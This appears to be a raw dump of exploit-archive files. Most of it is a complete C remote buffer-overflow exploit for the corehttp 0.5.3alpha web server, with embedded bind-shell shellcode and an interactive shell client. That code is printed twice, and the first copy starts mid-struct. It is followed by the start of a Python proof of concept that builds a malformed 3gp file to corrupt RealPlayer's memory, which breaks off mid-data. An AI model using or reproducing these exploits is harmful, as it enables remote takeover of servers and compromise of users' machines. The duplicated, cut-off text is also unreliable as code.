unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// milw0rm.com [2007-07-29]
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* [*] target : dual.fakehalo.lan:5555 *
* [*] return address : 0xbfffea60 *
* [*] *sprocket replacement : 0xbfffec60 *
* *
* [*] attempting to connect: dual.fakehalo.lan:5555. *
* [*] successfully connected: dual.fakehalo.lan:5555. *
* [*] sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* [*] closing connection. *
* *
* [*] attempting to connect: dual.fakehalo.lan:7979. *
* [*] successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// milw0rm.com [2007-07-29]

667
platforms/multiple/dos/39182.py Executable file
View file

@ -0,0 +1,667 @@
source: http://www.securityfocus.com/bid/67434/info
RealPlayer is prone to a memory-corruption vulnerability.
An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.
Realplayer 16.0.3.51 is vulnerable; other versions may also be affected.
# Exploit Title: [Realplayer memory corruption in latest Version 16.0.3.51 ]
# Date: [2014/05/13]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.real.com]
# Software Link: [
http://www.filehippo.com/download_realplayer/download/9b931239de41b8dce664656f25e1c28b/
]
# Version: [Version 16.0.3.51 and prior to that]
# Tested on: [Windows Xp Sp 3 x86, Windows 7 Sp1 x86]
# CVE : [CVE-2014-3444]
details:
Realplayer latest version 16.0.3.51 suffers from an memory corruption
Vulnerability via a malformed .3gp file format when
load RealPlayer\codecs\dmp4.dll .
####Note:it's Exploitable , But Not Stable.####
Poc:
#!/usr/bin/python
data
="\x00\x00\x00\x18\x66\x74\x79\x70\x33\x67\x70\x36\x00\x00\x01\x00\x69\x73\x6F\x6D\x33\x67\x70\x36\x00\x00
\x0F\x2D\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x02\x58
\x00\x00\x19\xFA\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69
\x6F\x64\x73\x00\x00\x00\x00\x10\x07\x00\x4F\xFF\xFF\x28\x08\xFF\x00\x00\x05\xA4\x74\x72\x61\x6B\x00\x00\x00\x5C\x74
\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x19\xFA\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\xB0\x00\x00\x00\x90\x00\x00\x00\x00\x05
\x40\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x0C\x00
\x00\x00\x85\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x64\x65\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65
\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30\x31\x31\x00\x00\x00\x04\xCC\x6D\x69
\x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x64\x69\x6E\x66
\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00\x00\x00\x01\x00\x00
\x04\x8C\x73\x74\x62\x6C\x00\x00\x00\xB8\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xA8\x6D\x70\x34\x76
\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB0\x00\x90\x00\x48
\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xFF\xFF\x00\x00\x00\x52\x65\x73\x64\x73\x00\x00\x00\x00
\x03\x44\x00\x00\x00\x04\x3C\x20\x11\x00\x07\x61\x00\x01\x19\xE8\x00\x00\xCD\xE0\x05\x2D\x00\x00\x01\xB0\x08\x00\x00\x01
\xB5\x89\x13\x00\x00\x01\x00\x00\x00\x01\x20\x00\xC4\x8D\x88\x00\x65\x05\x84\x12\x14\x63\x00\x00\x01\xB2\x4C\x61\x76\x63
\x35\x32\x2E\x34\x31\x2E\x30\x06\x01\x02\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x85
\x00\x00\x00\x01\x00\x00\x00\x1C\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x3D\x00\x00
\x00\x79\x00\x00\x01\x00\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01
\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00
\x00\x06\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00\x01
\x00\x00\x00\x09\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00
\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0D\x00\x00\x00\x05\x00\x00\x00\x01
\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00
\x00\x06\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x06\x00\x00\x00\x01
\x00\x00\x00\x14\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x15\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x17\x00\x00
\x00\x05\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x02\x28\x73\x74\x73\x7A\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x85\x00\x00\x07\x61\x00\x00\x00\xB6\x00\x00\x01\x72\x00\x00\x01\x70\x00\x00\x01\xDC\x00\x00
\x01\xFF\x00\x00\x02\x54\x00\x00\x02\x37\x00\x00\x02\x25\x00\x00\x02\x48\x00\x00\x02\x2C\x00\x00\x02\x3B\x00\x00\x02\x62
\x00\x00\x02\x4E\x00\x00\x02\x81\x00\x00\x02\xD9\x00\x00\x03\x05\x00\x00\x02\x5F\x00\x00\x03\x8B\x00\x00\x02\xDD\x00\x00
\x02\xB8\x00\x00\x02\xD7\x00\x00\x02\x90\x00\x00\x02\xA3\x00\x00\x02\x33\x00\x00\x02\x3E\x00\x00\x02\x2F\x00\x00\x02\x22
\x00\x00\x02\x31\x00\x00\x02\x0C\x00\x00\x02\x76\x00\x00\x01\xF4\x00\x00\x02\x03\x00\x00\x02\x22\x00\x00\x04\x27\x00\x00
\x02\x45\x00\x00\x02\x19\x00\x00\x02\x14\x00\x00\x03\x55\x00\x00\x02\x27\x00\x00\x01\xDF\x00\x00\x03\xDB\x00\x00\x02\x62
\x00\x00\x02\x20\x00\x00\x03\x5D\x00\x00\x01\xE6\x00\x00\x01\xE3\x00\x00\x03\xA0\x00\x00\x02\x3A\x00\x00\x02\x12\x00\x00
\x03\x4C\x00\x00\x01\xD4\x00\x00\x01\xD2\x00\x00\x01\xC5\x00\x00\x04\x0B\x00\x00\x02\x08\x00\x00\x01\xFA\x00\x00\x03\x68
\x00\x00\x01\xC6\x00\x00\x01\x94\x00\x00\x05\x5E\x00\x00\x00\xFD\x00\x00\x02\xF1\x00\x00\x03\xCC\x00\x00\x02\x4A\x00\x00
\x03\x47\x00\x00\x01\x71\x00\x00\x01\x77\x00\x00\x01\xA5\x00\x00\x01\x1D\x00\x00\x02\x31\x00\x00\x02\x6C\x00\x00\x02
\x5F\x00\x00\x02\x2A\x00\x00\x01\xD3\x00\x00\x02\x1D\x00\x00\x01\x71\x00\x00\x02\x04\x00\x00\x02\x7D\x00\x00\x01\x62\x00
\x00\x01\x9E\x00\x00\x01\x7D\x00\x00\x01\xBC\x00\x00\x01\xAD\x00\x00\x01\xDC\x00\x00\x01\x76\x00\x00\x01\xBF\x00\x00\x01
\x48\x00\x00\x01\xD7\x00\x00\x02\x29\x00\x00\x02\x03\x00\x00\x02\x7C\x00\x00\x01\x77\x00\x00\x01\x6F\x00\x00\x01\x2A\x00
\x00\x01\xE0\x00\x00\x01\x7E\x00\x00\x01\x72\x00\x00\x01\x81\x00\x00\x01\x90\x00\x00\x01\xC4\x00\x00\x01\x1B\x00\x00\x01
\x73\x00\x00\x02\x02\x00\x00\x01\x36\x00\x00\x01\x5A\x00\x00\x01\x8C\x00\x00\x02\x1B\x00\x00\x01\xB7\x00\x00\x01\xC2\x00
\x00\x01\xAC\x00\x00\x01\xDA\x00\x00\x01\x8B\x00\x00\x01\x63\x00\x00\x01\xB5\x00\x00\x01\x76\x00\x00\x01\x52\x00\x00\x01
\x84\x00\x00\x01\x6C\x00\x00\x01\xBF\x00\x00\x06\x65\x00\x00\x01\x86\x00\x00\x02\x03\x00\x00\x00\xEF\x00\x00\x01\xE1\x00
\x00\x03\x13\x00\x00\x02\x40\x00\x00\x01\x86\x00\x00\x01\xB0\x00\x00\x01\xD1\x00\x00\x01\x78\x00\x00\x01\xE5\x00\x00\x01
\xD6\x00\x00\x00\x70\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x0F\x4D\x00\x00\x27\x20\x00\x00\x39\xD5\x00
\x00\x4F\xCF\x00\x00\x62\xBA\x00\x00\x75\x1D\x00\x00\x87\x37\x00\x00\x9A\x85\x00\x00\xAF\x7B\x00\x00\xC2\x04\x00\x00\xD6
\x7D\x00\x00\xE8\xA2\x00\x00\xFC\x16\x00\x01\x0B\xC2\x00\x01\x1C\x5D\x00\x01\x2B\x87\x00\x01\x3A\x12\x00\x01\x49\x8D\x00
\x01\x56\x5B\x00\x01\x65\x6C\x00\x01\x73\x63\x00\x01\x81\x9E\x00\x01\x95\x8F\x00\x01\xA5\x54\x00\x00\x06\x0D\x74\x72\x61
\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x02\x00\x00\x00\x00\x00
\x00\x19\xE7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x05\xA9\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2
\xCC\x8C\xBA\xF2\x00\x00\x56\x22\x00\x03\xB8\x00\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00
\x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69
\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30
\x31\x31\x00\x00\x00\x05\x35\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
